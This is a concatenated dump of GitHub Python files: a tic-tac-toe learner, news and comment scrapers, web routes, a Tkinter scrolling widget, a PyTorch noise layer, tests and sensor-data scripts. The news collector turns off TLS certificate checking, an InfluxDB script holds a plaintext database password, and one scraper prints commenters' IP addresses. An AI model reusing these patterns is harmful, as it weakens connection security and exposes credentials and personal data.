utils.play(env, dual, render=False)\n\n agent1.save(AGENT1_DATA_PATH)\n agent2.save(AGENT2_DATA_PATH)\n\n dual.set_train_mode(False)\n\n count1 = {-1: 0, 1: 0, 0: 0}\n for _ in range(100):\n winner = utils.play(env, dual_o)\n count1[winner] += 1\n\n count2 = {-1: 0, 1: 0, 0: 0}\n for _ in range(100):\n winner = utils.play(env, dual_x)\n count2[winner] += 1\n\n print(step+STEP, count1[1], count1[-1], count1[0], count2[1], count2[-1], count2[0])\n\n # 
5 consecutive full tie, learning completed\n if count1[-1] == 0 and count2[1] == 0:\n full_tie += 1\n if full_tie == 5:\n break\n else:\n full_tie = 0\n","repo_name":"jaywon99/tictactoe","sub_path":"players/pgn/learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15671393718","text":"import json\nimport requests\nimport time\n\n\n\ndef test():\n url = 'https://api-zero.livere.com/v1/comments/list?callback=jQuery112403473268296510956_1531502963311&limit=10&repSeq=4272904&requestPath=%2Fv1%2Fcomments%2Flist&consumerSeq=1020&livereSeq=28583&smartloginSeq=5154&_=1531502963313'\n\n res = requests.get(url)\n json_string = res.text\n json_string = json_string[json_string.find('{'):-2]\n data = json.loads(json_string)\n commen_list = data['results']['parents']\n for comm in commen_list:\n print(comm['name'] + ':' + comm['content'] + '(IP:%s)' % comm['ipAddress'])\n\n# https://www.toutiao.com/api/search/content/?\n# aid=24&app_name=web_search&offset=0&\n# format=json&keyword=python&autoload=true&count=20&en_qc=1&\n# cur_tab=1&from=search_tab&pd=synthesis×tamp=1554519458678\n#\n# https://www.toutiao.com/api/search/content/?\n# aid=24&app_name=web_search&offset=20&\n# format=json&keyword=python&autoload=true&count=20&en_qc=1&\n# cur_tab=1&from=search_tab&pd=synthesis×tamp=1554519548753\n\ndef today_news():\n headers = {\n \"UserAgent\": 'Mozilla / 5.0(Windows NT 6.1;WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 69.0.3497.100Safari / 537.36'\n }\n url = 'https://www.toutiao.com/api/search/content/?aid=24&app_name=web_search&offset={}&format=json&keyword=python&autoload=true&count=20&en_qc=1&cur_tab=1&from=search_tab&pd=synthesis'\n\n #print(data['data'][6]['article_url'])\n with open('./toutiao.txt', 'w') as f:\n for i in range(10):\n uri = url.format(str(i * 20))\n print(uri)\n res = requests.get(uri, headers=headers)\n time.sleep(1)\n json_string = res.text\n data = json.loads(json_string)\n for i in data['data']:\n if 'article_url' in i:\n f.write(i['title'] + ':' + i['article_url'] + '\\n')\n print(i['title'], i['article_url'])\n\n\n\n f.close()\n\n\n\n\n\n\n\n\ndef main():\n today_news()\n\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"iiclear/scarapy_job","sub_path":"AJAX.py","file_name":"AJAX.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12716068336","text":"from starlette.responses import RedirectResponse\nfrom starlette.templating import Jinja2Templates\nfrom starlette.requests import Request\n\nfrom http import HTTPStatus\n\ntemplates = Jinja2Templates(directory=\"templates/guest\")\n\nasync def signin(request: Request):\n \n if request.cookies.get(\"logged-in\"):\n \n return RedirectResponse(\"/\", HTTPStatus.FOUND)\n \n return templates.TemplateResponse(\"signin.jinja2\", {\n \"request\": request\n })\n \nasync def register(request: Request):\n \n if request.cookies.get(\"logged-in\"):\n \n return RedirectResponse(\"/\", HTTPStatus.FOUND) \n \n return templates.TemplateResponse(\"register.jinja2\", {\n \"request\": request\n })","repo_name":"MatthewXiatthew/Tennis69420","sub_path":"tennis360/router/guest/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"2199852099","text":"#a variable delaring the number 
of people types there are.\ntypes_of_people = 10\n#a string to use the data from the variable above. Stored in a variable for later use.\nx = f\"There are {types_of_people} types of people\"\n\n#a varibale with the word binary in it.\nbinary = \"binary\"\n#a variable with the word don't in it.\ndo_not = \"don't\"\n#a string to use the data from the variables above. Stored in a variable for later use.\ny = f\"Those who know {binary} and those who {do_not}.\" #a string (or two) inside a string\n\n#a statement to print the x variable defined on line 4.\nprint(x)\n#a statement to print the y variable defined on line 11.\nprint(y)\n\n#another pritn statement to print the variable x. This time with some added text.\nprint(f\"I said: {x}.\") #a string inside a string.\n#another pritn statement to print the variable y. This time with some added text.\nprint(f\"I also said: '{y}'\") #a string inside a string.\n\n#a boolean. To keep me on my toes.\nhilarious = False\n#a string with some curly brackets for later formatting.\njoke_evaluation = \"Isn't that joke so funny?! {}\"\n#a print statement using the boolena and string with formating directly above.\nprint(joke_evaluation.format(hilarious))\n\n# a variable, w, containing a string.\nw = \"This is the left side of...\"\n# a varibale, e, containing further string text\ne = \"a string with a right side.\"\n\n# a print statement using the two variables above and concatcenating them together.\nprint(w + e)\n\n# There are three strings inside of strings in this exercise. The first posibility on line 4 is actually an integer inside of a string.\n# The second potential is the print statement on line 28. This is a string with a boolean, not another string.\n","repo_name":"nikkiredfern/learning_python","sub_path":"LPTHW/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"2665596011","text":"from newspaper import Article\n\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen, Request\n\nfrom news.models import Newsmodel, cartegory\nimport pickle\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n\ndef main():\n\n f = open('forbidenlist.pkl', 'rb')\n a = pickle.load(f)\n all = []\n sitelist = [\n \"https://dailytimes.ng/category/news/\",\n \"https://tribuneonlineng.com/category/latest-news/\",\n \"https://twmagazine.net/category/beauty/\",\n \"https://twmagazine.net/category/fashion/\",\n \"https://twmagazine.net/category/living/\",\n \"https://twmagazine.net/category/love/\",\n \"https://guardian.ng/latest/\",\n \"https://www.vanguardngr.com/news\",\n \"https://edition.cnn.com/africa\",\n \"https://edition.cnn.com/world\",\n \"https://edition.cnn.com/entertainment\",\n \"https://edition.cnn.com\",\n \"https://thenationonlineng.net/category/news/\"\n ]\n\n while True:\n\n for site in sitelist:\n req = Request(site, headers={'User-Agent': 'Mozilla/5.0'})\n\n html = urlopen(req) # Insert your URL to extrac\n page = BeautifulSoup(html.read(), 'lxml')\n for link in page.find_all('a'):\n b = link.get('href')\n\n if b not in a:\n if b not in all:\n all.append(b)\n\n if all.count(b) == 2:\n all.remove(b)\n\n print(len(all))\n for each in all:\n l = ['vanguard', 'nation', 'cnn', 'theguardian', '127', 'dailytimes', 'dailytrust',\n 'tribune']\n '''\n\t\t\t\tthe purpose of this is to fetch the image corespond with the model\n\t\t\t\te.g {source}.jpg in template\n\t\t\t\t'''\n source = None\n if 
each==None:\n continue\n for s in l:\n if s in each:\n source = s\n break\n else:\n pass\n\n try:\n url = each\n article = Article(url)\n article.download()\n article.parse()\n\n n = Newsmodel()\n print(article.title)\n n.author = article.authors\n n.article_img = article.top_img\n n.heading = article.title\n n.content = article.text\n n.source_url = each\n n.source = source+'.png'\n n.save()\n print(\"saved\")\n n.newscat.add(cartegory.objects.get(cat=\"News\"))\n n.save()\n\n except:\n\n print('url error')\n a.extend(all)\n all.clear()\n\n with open('forbidenlist.pkl', 'wb') as f:\n pickle.dump(a, f)\n badtit = ['News', 'Latest Nigeria News, Nigerian Newspapers, Politics', '',\n 'Vanguard News', 'Vanguard News, Sports and Business from vanguard Newspapers -',\n 'Page'\n ]\n for i in badtit:\n Newsmodel.objects.filter(heading=i).delete()\n\n# main()\n# import pickle\n# from concurrent.futures import ThreadPoolExecutor\n# from urllib.request import urlopen, Request\n# from bs4 import BeautifulSoup\n# from newspaper import Article\n# from news.models import Newsmodel, cartegory\n# import ssl\n# ssl._create_default_https_context = ssl._create_unverified_context\n\n\n# def scrape_site(site):\n# forbidden_list = pickle.load(open('forbidenlist.pkl', 'rb'))\n# news_links = []\n# source = None\n# l = ['vanguard', 'nation', 'cnn', 'theguardian',\n# '127', 'dailytimes', 'dailytrust', 'tribune']\n# req = Request(site, headers={'User-Agent': 'Mozilla/5.0'})\n# with urlopen(req) as html:\n# page = BeautifulSoup(html, 'lxml')\n# for link in page.find_all('a'):\n# url = link.get('href')\n# if url and url not in forbidden_list and url not in news_links:\n# news_links.append(url)\n\n# for link in news_links:\n# if any(s in link for s in l):\n# for s in l:\n# if s in link:\n# source = s + '.png'\n# break\n# break\n\n# news = []\n# # with ThreadPoolExecutor() as executor:\n# for link in news_links:\n# print(link)\n# if link not in forbidden_list:\n# news.append(scrape_news(link, source))\n\n# for n in news:\n# try:\n# data = n.result()\n# if data:\n# Newsmodel.objects.create(\n# newscat=cartegory.objects.get(cat='News'),\n# author=data['author'],\n# article_img=data['image_url'],\n# heading=data['title'],\n# content=data['text'],\n# source_url=data['source_url'],\n# source=source\n# )\n# except Exception as e:\n# print(f\"Error processing news: {e}\")\n# forbidden_list.extend(news_links)\n# with open('forbidenlist.pkl', 'wb') as f:\n# pickle.dump(forbidden_list, f)\n\n\n# def scrape_news(link, source):\n# try:\n# article = Article(link)\n# article.download()\n# article.parse()\n# return {\n# 'author': article.authors,\n# 'image_url': article.top_img,\n# 'title': article.title,\n# 'text': article.text,\n# 'source_url': link,\n# 'source': source,\n# }\n# except Exception as e:\n# print(f\"Error downloading news: {e}\")\n# return None\n\n\n# def main():\n# site_list = [\n# # \"https://dailytimes.ng/category/news/\",\n# \"https://tribuneonlineng.com/category/latest-news/\",\n# \"https://twmagazine.net/category/beauty/\",\n# \"https://twmagazine.net/category/fashion/\",\n# \"https://twmagazine.net/category/living/\",\n# \"https://twmagazine.net/category/love/\",\n# \"https://guardian.ng/latest/\",\n# \"https://www.vanguardngr.com/news\",\n# \"https://edition.cnn.com/africa\",\n# \"https://edition.cnn.com/world\",\n# \"https://edition.cnn.com/entertainment\",\n# \"https://edition.cnn.com\",\n# \"https://thenationonlineng.net/category/news/\"\n# ]\n# for site in site_list:\n# scrape_site(site)\n\n# # delete news 
with bad titles\n# bad_titles = ['News', 'Latest Nigeria News, Nigerian Newspapers, Politics', '',\n# 'Vanguard News', 'Vanguard News, Sports and Business from vanguard Newspapers -', 'Page']\n# Newsmodel.objects.filter(heading__in=bad_titles).delete()\n\n\n# if __name__ == \"__main__\":\n# main()\n","repo_name":"quadratoms/whotnews","sub_path":"news/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":7014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74819511658","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom tkinter import Canvas, Frame, Scrollbar\nfrom componentProperty import update_all_property, get_default_component_info\n\n\ndef create_default_component(master, component_type, component_name, prop=None, use_name=True):\n \"\"\"\n 创建默认控件\n :param master: 父控件\n :param component_type: 控件类型\n :param component_name: 控件名字\n :param prop: 需要更新的属性\n :param use_name: 是否使用控件名字\n :return: 控件\n \"\"\"\n class_name = getattr(sys.modules[__name__], component_type)\n if use_name:\n component = class_name(master, name=component_name)\n else:\n component = class_name(master)\n\n component_info = get_default_component_info(component_type, prop)\n update_all_property(component, component_info, component_type)\n\n return component, component_info\n\n\nclass ScrollCanvas(Canvas):\n\n def __init__(self, master=None, cnf={}, **kw):\n\n Canvas.__init__(self, master, cnf, **kw)\n self.is_show_scroll_x = 1 # 是否显示水平滚动条\n self.is_show_scroll_y = 1 # 是否显示垂直滚动条\n self.is_always_show_scroll = 1 # 是否总是显示滚动条\n self.scroll_x_height = 17 # 水平滑动条默认高度\n self.scroll_x_width = 200 # 水平滑动条默认宽度\n self.scroll_y_height = 200 # 垂直滑动条默认高度\n self.scroll_y_width = 17 # 垂直滑动条默认宽度\n\n def set_is_show_scroll_x(self, is_show_scroll_x):\n \"\"\"\n 设置是否显示水平滑动条\n :param is_show_scroll_x:是否显示\n :return:None\n \"\"\"\n if self.is_show_scroll_x == is_show_scroll_x:\n return\n self.is_show_scroll_x = is_show_scroll_x\n self.do_layout_need_control()\n\n def get_is_show_scroll_x(self):\n \"\"\"\n 获取是否显示水平滑动条\n :return:bool\n \"\"\"\n return self.is_show_scroll_x\n\n def set_is_show_scroll_y(self, is_show_scroll_y):\n \"\"\"\n 设置是否显示垂直滑动条\n :param is_show_scroll_y:是否显示\n :return:None\n \"\"\"\n if self.is_show_scroll_y == is_show_scroll_y:\n return\n self.is_show_scroll_y = is_show_scroll_y\n self.do_layout_need_control()\n\n def get_is_show_scroll_y(self):\n \"\"\"\n 获取是否显示垂直滑动条\n :return:bool\n \"\"\"\n return self.is_show_scroll_y\n\n def set_is_always_show_scroll(self, is_always_show_scroll):\n \"\"\"\n 设置是否一直显示滑动条\n :param is_always_show_scroll:是否一直显示\n :return:None\n \"\"\"\n if self.is_always_show_scroll == is_always_show_scroll:\n return\n self.is_always_show_scroll = is_always_show_scroll\n self.do_layout_need_control()\n\n def get_is_always_show_scroll(self):\n \"\"\"\n 获取是否一直显示滑动条\n :return:bool\n \"\"\"\n return self.is_always_show_scroll\n\n @property\n def scroll_bar_x(self):\n return self.children.get(\"scroll_bar_x\", None)\n\n @property\n def scroll_bar_y(self):\n return self.children.get(\"scroll_bar_y\", None)\n\n @property\n def slide_window(self):\n return self.children.get(\"slide_window\", None)\n\n def on_update(self):\n \"\"\"\n 初始化后会被调用,在这里创建滚动条和滑动窗口\n :return: None\n \"\"\"\n self.create_need_control()\n self.update_scroll()\n\n def create_need_control(self):\n \"\"\"\n 创建所需控件\n :return:None\n \"\"\"\n self.create_slide_window()\n self.create_scroll_bar()\n self.do_layout_need_control()\n\n def 
create_slide_window(self):\n \"\"\"\n 创建滑动窗口\n :return:None\n \"\"\"\n prop = {\n \"background\": self[\"background\"],\n }\n create_default_component(self, \"Frame\", \"slide_window\", prop)\n self.create_window((1, 1), window=self.slide_window, anchor=\"nw\")\n\n self.slide_window.bind(\"\", self.scroll_slide_window_y)\n self.slide_window.bind(\"\", self.scroll_slide_window_x)\n\n def create_scroll_bar(self):\n \"\"\"\n 创建滑动条\n :return:None\n \"\"\"\n prop_scroll_y = {\n \"command\": self.yview,\n \"width\": self.scroll_y_width, \"height\": self.scroll_y_height\n }\n create_default_component(self, \"Scrollbar\", \"scroll_bar_y\", prop_scroll_y)\n\n prop_scroll_x = {\n \"orient\": \"horizontal\", \"command\": self.xview,\n \"width\":self.scroll_x_width, \"height\":self.scroll_x_height\n }\n create_default_component(self, \"Scrollbar\", \"scroll_bar_x\", prop_scroll_x)\n\n # 绑定滑动条事件\n self.configure(xscrollcommand=self.scroll_bar_x.set)\n self.configure(yscrollcommand=self.scroll_bar_y.set)\n\n def do_layout_need_control(self):\n \"\"\"\n 重新布局界面\n :return:None\n \"\"\"\n self.do_layout_scroll_bar_x()\n self.do_layout_slide_window()\n self.do_layout_scroll_bar_y()\n\n def do_layout_scroll_bar_x(self):\n \"\"\"\n 重新布局水平滑动条\n :return: None\n \"\"\"\n if self.scroll_bar_x is None:\n return\n\n self.scroll_bar_x.place_configure(x=1, y=int(self[\"height\"]) - self.scroll_x_height)\n self.scroll_bar_x.place_configure(width=int(self[\"width\"]) - int(self.scroll_bar_y.place_info().get(\"width\", 0)) - 1)\n self.scroll_bar_x.place_configure(height=self.scroll_x_height)\n\n # 隐藏水平滑动条\n if not self.get_is_show_scroll_x():\n self.scroll_bar_x.place_forget()\n\n def do_layout_scroll_bar_y(self):\n \"\"\"\n 重新布局垂直滑动条\n :return: None\n \"\"\"\n if self.scroll_bar_y is None:\n return\n\n self.scroll_bar_y.place_configure(x=int(self[\"width\"]) - int(self.scroll_y_width), y=2)\n self.scroll_bar_y.place_configure(width=self.scroll_y_width)\n self.scroll_bar_y.place_configure(height=int(self[\"height\"]) - 2)\n\n # 隐藏垂直滑动条\n if not self.get_is_show_scroll_y():\n self.scroll_bar_y.place_forget()\n\n def do_layout_slide_window(self):\n \"\"\"\n 重新布局slide window\n :return: None\n \"\"\"\n if self.slide_window is None:\n return\n\n self.slide_window[\"width\"] = int(self[\"width\"])\n self.slide_window[\"height\"] = int(self[\"height\"])\n\n def update_scroll(self):\n \"\"\"\n 更新滑动条\n :return:None\n \"\"\"\n self.update_scroll_vertical()\n self.update_scroll_horizontal()\n self.configure(scrollregion=self.bbox(\"all\"))\n\n def update_scroll_vertical(self):\n \"\"\"\n 更新垂直滑动条\n :return:None\n \"\"\"\n pos_y = self.calc_slide_window_height()\n is_always_show = self.get_is_always_show_scroll()\n\n visible = False\n if pos_y > int(self[\"height\"]):\n self.slide_window[\"height\"] = pos_y + 20\n visible = True\n else:\n if int(self.slide_window[\"height\"]) > int(self[\"height\"]):\n self.slide_window[\"height\"] = int(self[\"height\"]) - self.scroll_x_height\n\n # 一直显示垂直滑动条\n if is_always_show:\n visible = True\n\n if not self.get_is_show_scroll_y():\n visible = False\n\n if visible:\n self.do_layout_scroll_bar_y()\n else:\n self.scroll_bar_y.place_forget()\n\n def calc_slide_window_height(self):\n \"\"\"\n 计算滑动窗口的高度\n :return: int\n \"\"\"\n pos_y = 0\n\n for (childName, child) in self.slide_window.children.items():\n if int(child.place_info()[\"y\"]) + child.winfo_reqheight() > pos_y:\n pos_y = int(child.place_info()[\"y\"]) + child.winfo_reqheight()\n\n return pos_y\n\n def update_scroll_horizontal(self):\n 
\"\"\"\n 更新水平滑动条\n :return:None\n \"\"\"\n pos_x = self.calc_slide_window_width()\n is_always_show = self.get_is_always_show_scroll()\n\n visible = False\n if pos_x > int(self[\"width\"]):\n self.slide_window[\"width\"] = pos_x + 20\n visible = True\n else:\n if int(self.slide_window[\"width\"]) > int(self[\"width\"]):\n self.slide_window[\"width\"] = int(self[\"width\"]) - self.scroll_y_width\n\n # 一直显示垂直滑动条\n if is_always_show:\n visible = True\n\n if not self.get_is_show_scroll_x():\n visible = False\n\n if visible:\n self.do_layout_scroll_bar_x()\n else:\n self.scroll_bar_x.place_forget()\n\n def calc_slide_window_width(self):\n \"\"\"\n 计算滑动窗口的宽度\n :return: int\n \"\"\"\n pos_x = 0\n\n for (childName, child) in self.slide_window.children.items():\n if int(child.place_info()[\"x\"]) + child.winfo_reqwidth() > pos_x:\n pos_x = int(child.place_info()[\"x\"]) + child.winfo_reqwidth()\n\n return pos_x\n\n def scroll_slide_window_y(self, event):\n \"\"\"\n 垂直滚动页面\n :param event:\n :return:None\n \"\"\"\n if int(self.slide_window[\"height\"]) <= int(self[\"height\"]):\n return\n units = -5 if event.delta > 0 else 5\n self.yview_scroll(units, \"units\")\n\n def scroll_slide_window_x(self, event):\n \"\"\"\n 水平滚动页面\n :param event:\n :return:None\n \"\"\"\n if int(self.slide_window[\"width\"]) <= int(self[\"width\"]):\n return\n units = -5 if event.delta > 0 else 5\n self.xview_scroll(units, \"units\")\n\n def get_child_master(self):\n return self.slide_window\n\n def on_end_drag_master(self):\n self.update_scroll()\n\n def on_size_change(self):\n \"\"\"\n 窗口尺寸变化时的处理\n :return: None\n \"\"\"\n self.do_layout_need_control()\n\n def refresh_slide_window_bg(self):\n \"\"\"\n 刷新slide_window背景\n :return: None\n \"\"\"\n prop = {\n \"background\": self[\"background\"],\n }\n self.slide_window.configure(prop)\n\n @staticmethod\n def create_default(master, prop=None):\n return create_default_component(master, \"ScrollCanvas\", None, prop, False)\n","repo_name":"archmage9999/tkinterEditor","sub_path":"ScrollCanvas.py","file_name":"ScrollCanvas.py","file_ext":"py","file_size_in_byte":10858,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"92"} +{"seq_id":"644599017","text":"from __future__ import annotations\n\nimport torch\nimport torch.nn as nn\n\n\nclass Noise(nn.Module):\n \"\"\"Poisson-Gaussian noise layer.\n\n Noise layer based on the reparameterization trick\n https://stats.stackexchange.com/questions/199605/how-does-the-reparameterization-trick-for-vaes-work-and-why-is-it-important\n \"\"\"\n\n def __init__(self, gain, readnoise_std, bg_min, bg_max, num_shots):\n \"\"\"__init__ for Noise.\"\"\"\n super().__init__()\n if isinstance(gain, float):\n gain = [gain for _ in range(num_shots)]\n if isinstance(readnoise_std, float):\n readnoise_std = [readnoise_std for _ in range(num_shots)]\n assert len(gain) == num_shots\n assert len(readnoise_std) == num_shots\n self.bg_min = bg_min\n self.bg_range = bg_max - bg_min\n\n self.register_buffer(\n \"gain\", torch.tensor(gain).reshape(1, -1, 1, 1), persistent=False\n )\n self.register_buffer(\n \"sigma\", torch.tensor(readnoise_std).reshape(1, -1, 1, 1), persistent=False\n )\n\n def forward(self, x):\n \"\"\"Compute the forward step.\"\"\"\n batch_sz = x.shape[0]\n bg = (\n self.bg_min + self.bg_range * torch.rand(batch_sz, device=self.gain.device)\n ).reshape(batch_sz, 1, 1, 1)\n x_plus_bg = x + bg\n unit_noise = torch.randn_like(x)\n noise_sigma = torch.sqrt(x_plus_bg) + self.sigma / self.gain\n noisy_img = 
self.gain * (x_plus_bg + noise_sigma * unit_noise)\n return noisy_img\n","repo_name":"computational-imaging/multishot-localization-microscopy","sub_path":"module/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"27057585272","text":"import random\nfrom unittest import mock\n\nfrom django.core.handlers.wsgi import WSGIRequest\nfrom django.test import TestCase\n\nfrom bk_resource.utils.local import local\nfrom bk_resource.utils.request import (\n get_moke_request,\n get_request_username,\n set_local_username,\n)\nfrom tests.constants.utils.request import DEFAULT_USERNAME\nfrom tests.mock.utils.request import GetLocalRequest\n\n\nclass TestGetRequestUsername(TestCase):\n def test(self):\n self.assertIsNotNone(get_request_username())\n\n @mock.patch(\"blueapps.utils.request_provider.get_local_request\", GetLocalRequest)\n def test_error(self):\n self.assertIsNotNone(get_request_username())\n\n @mock.patch(\"blueapps.utils.request_provider.get_local_request\", GetLocalRequest)\n def test_default(self):\n local.username = None\n self.assertEqual(DEFAULT_USERNAME, get_request_username(DEFAULT_USERNAME))\n\n\nclass TestSetLocalUsername(TestCase):\n def test(self):\n username = random.random()\n set_local_username(username)\n self.assertEqual(username, local.username)\n\n\nclass TestMockRequest(TestCase):\n def test(self):\n self.assertIsInstance(get_moke_request(), WSGIRequest)\n","repo_name":"TencentBlueKing/bk-resource","sub_path":"tests/test_cases/utils/test_request.py","file_name":"test_request.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"72632496940","text":"from camera.linescan import LineScan\nfrom camera.gocator import GoCator\nfrom gui.widgets.lazyCanvas.lazyCanvas import LazyCanvas\nfrom gui.widgets.lazyCanvas.lazyGraphicsItem import LazyGraphicsPixmapItem\nfrom gui.widgets.lazyCanvas.linescanFrame import LinescanFrame\nfrom gui.widgets.lazyCanvas.gocatorFrame import GocatorFrame, ProjectedGocatorFrame\n\ndefault_scan = 5\n\n\ndef test_linescan(\n canvas: LazyCanvas,\n target_path: str = f\"data/line/{default_scan}\",\n target_width=1024,\n):\n camera = LineScan(target_path)\n\n preload_data, _ = camera.get(0)\n\n h, w = preload_data.shape[:-1]\n\n target_w = target_width\n target_h = int(target_w * 1.0 * h / w)\n\n for i in range(camera.data_size()):\n item = LinescanFrame(camera, i, target_w, target_h, w, h)\n item.setPos(0, target_h * i)\n item.release()\n canvas.addItem(item)\n\n\ndef test_gocator(\n canvas: LazyCanvas, target_path: str = f\"data/gocator/xlsx/{default_scan}\"\n):\n camera = GoCator(target_path)\n\n dfs = camera.get(0)\n target_w = 1024\n _, _, data = camera.get_scaled_data(\n dfs, force_width=target_w, use_interp=True, keep_inf=True\n )\n preload_data = camera.get_image_from_depths(data)\n\n h, w = preload_data.shape\n\n target_h = target_w * 1.0 * h / w\n\n global_approx_min = None\n global_approx_max = None\n\n for i in range(camera.data_size()):\n item = GocatorFrame(camera, i, target_w, target_h, w, h)\n if global_approx_min is None or global_approx_max is None:\n global_approx_min, global_approx_max = item.estimate_approx_value_range()\n item.approx_min_value, item.approx_max_value = (\n global_approx_min,\n global_approx_max,\n )\n item.approx_min_value_limit, item.approx_max_value_limit = (\n global_approx_min,\n 
global_approx_max,\n )\n item.setPos(0, target_h * i)\n item.release()\n canvas.addItem(item)\n\n\ndef test_projected_gocator(\n canvas: LazyCanvas,\n gocator_path=f\"data/gocator/xlsx/{default_scan}\",\n linescan_path=f\"data/line/{default_scan}\",\n):\n gocator = GoCator(gocator_path)\n linescan = LineScan(linescan_path)\n\n dfs = gocator.get(0)\n data_h, data_w = dfs[\"data\"].to_numpy()[:, 1:].shape\n x_resolution = dfs[\"info\"][\"XResolution\"].values[0]\n y_resolution = dfs[\"info\"][\"YResolution\"].values[0]\n aspect_ratio = (y_resolution * data_h) / (x_resolution * data_w)\n h_calculated = round(data_w * aspect_ratio)\n h, w = h_calculated, linescan.res\n\n target_w = 1024\n target_h = round(target_w * 1.0 * h / w)\n\n global_approx_min = -2000\n global_approx_max = 0\n\n for i in range(gocator.data_size()):\n item = ProjectedGocatorFrame(gocator, linescan, i, target_w, target_h, w, h)\n if global_approx_min is None or global_approx_max is None:\n global_approx_min, global_approx_max = item.estimate_approx_value_range()\n item.approx_min_value, item.approx_max_value = (\n global_approx_min,\n global_approx_max,\n )\n item.approx_min_value_limit, item.approx_max_value_limit = (\n global_approx_min,\n global_approx_max,\n )\n item.setPos(0, target_h * i)\n item.release()\n canvas.addItem(item)\n output_min = gocator.get_sensor_value_from_distance_to_camera(\n dfs, -global_approx_min\n )\n output_max = gocator.get_sensor_value_from_distance_to_camera(\n dfs, -global_approx_max\n )\n return output_min, output_max\n\n\ndef test(canvas: LazyCanvas):\n test_gocator(canvas)\n","repo_name":"luojy95/AggreEvl","sub_path":"gui/test/lazypixmap.py","file_name":"lazypixmap.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21413349436","text":"# Question1PythonTest1.py\r\n# Cooper Cross\r\n# 10/8/19\r\n\r\nimport turtle\r\njoe = turtle.Turtle()\r\nx = 0\r\ny = 0\r\njoe.ht()\r\n\r\nfor i in range(3):\r\n joe.penup()\r\n joe.goto(x,y)\r\n joe.pendown()\r\n joe.forward(100)\r\n y = y + 20\r\n\r\n\r\n","repo_name":"CooperCross/HHS-Python","sub_path":"Question1PythonTest1.py","file_name":"Question1PythonTest1.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"27213438489","text":"import pandas as pd\nfrom influxdb import InfluxDBClient\nfrom influxdb import DataFrameClient\nimport matplotlib.pyplot as plt\nfrom tempQC.calibrationFunctions import calibration_temp, calibration_flow, data_chunk\nimport numpy as np\nimport os\n\n\nos.chdir('/Users/augustus/Desktop/GRA/Thesis/Figures/data/')\nfile = 'BLDG_C_03-23_02-24_RAWflow.csv'\n\ndf = pd.read_csv(file)\n\ndf['time'] = pd.to_datetime(df['time'])\ndf.set_index('time', inplace=True)\n\ndef adaptiveMedianFilter(signal, minWindowSize, maxWindowSize, threshold):\n filteredSignal = []\n window = []\n windowSize = minWindowSize\n headLength = 0\n for j in range(0, windowSize):\n window.append(signal[j])\n for i in range(0, len(signal)):\n delta = signal[i] - signal[i - 1]\n if np.absolute(delta) > threshold:\n windowSize = minWindowSize\n window.clear()\n if windowSize % 2 == 0:\n headLength = windowSize // 2\n else:\n headLength = (windowSize - 1) // 2\n if (i >= headLength) and (i < (len(signal) - headLength)):\n for j in range(0, windowSize):\n window.append(signal[i - (headLength - j)])\n elif (i < headLength):\n for j in range(0, windowSize):\n 
window.append(signal[i + j])\n else:\n for j in range(0, windowSize):\n window.append(signal[len(signal) - j])\n else:\n if (windowSize + 2) <= maxWindowSize:\n windowSize += 2\n window.append(0)\n window.append(0)\n\n if windowSize % 2 == 0:\n headLength = windowSize // 2\n else:\n headLength = (windowSize - 1) // 2\n if (i >= headLength) and (i < (len(signal) - headLength)):\n for j in range(0, windowSize):\n window[j] = signal[i - (headLength - j)]\n elif (i < headLength):\n for j in range(0, windowSize):\n window[j] = signal[i + j]\n else:\n for j in range(0, windowSize):\n window[j] = signal[len(signal) - j - 1]\n median = np.median(window)\n filteredSignal.append(median)\n percent = i / len(signal) * 100\n print(\" %2.2f %%, window size = %3d\" % (percent, windowSize), end=\"\\r\", flush=True)\n print(\"100.00 %%, window size = %3d\" % windowSize)\n return filteredSignal\n\n\n# accept inputs\nprint('Receiving inputs...\\n')\n# building ID\nbldg = input(\"Input building ID: \").upper()\nbldgIDQ1 = \"'\" + bldg + \"'\"\n# dates\nweek = int(input(\"Input week #: \"))\nbeginDate = \"'2019-03-22T12:00:00Z'\"\nendDate = \"'2019-03-22T18:00:00Z'\"\n\"\"\"\ndates = data_chunk(week)\n\n# Retrieve data\n# connect to database\nprint('\\nConnecting to database...')\n# Create client object with InfluxDBClient library\n# Set database.\nclient = InfluxDBClient(host='odm2equipment.uwrl.usu.edu', port=8086, username='root',password='foobar123')\nclient.switch_database('ciws')\n\n\n# write query\nprint('Assembling data query...')\n# Build query by concatenating inputs into query. InfluxDB query language has several\n# requirements. Fields/Tags must be bracketed with \" \" and the field/tag values must be bracketed with ' '.\n# Query returns a 'ResultSet\" type. Have to convert to pandas dataframe.\n\"\"\"\n#query = \"\"\"SELECT \"coldInFlowRate\",\"coldInTemp\", \"hotInFlowRate\", \"hotInTemp\", \"hotOutFlowRate\", \"hotOutTemp\"\n# FROM \"flow\"\n# WHERE \"buildingID\" 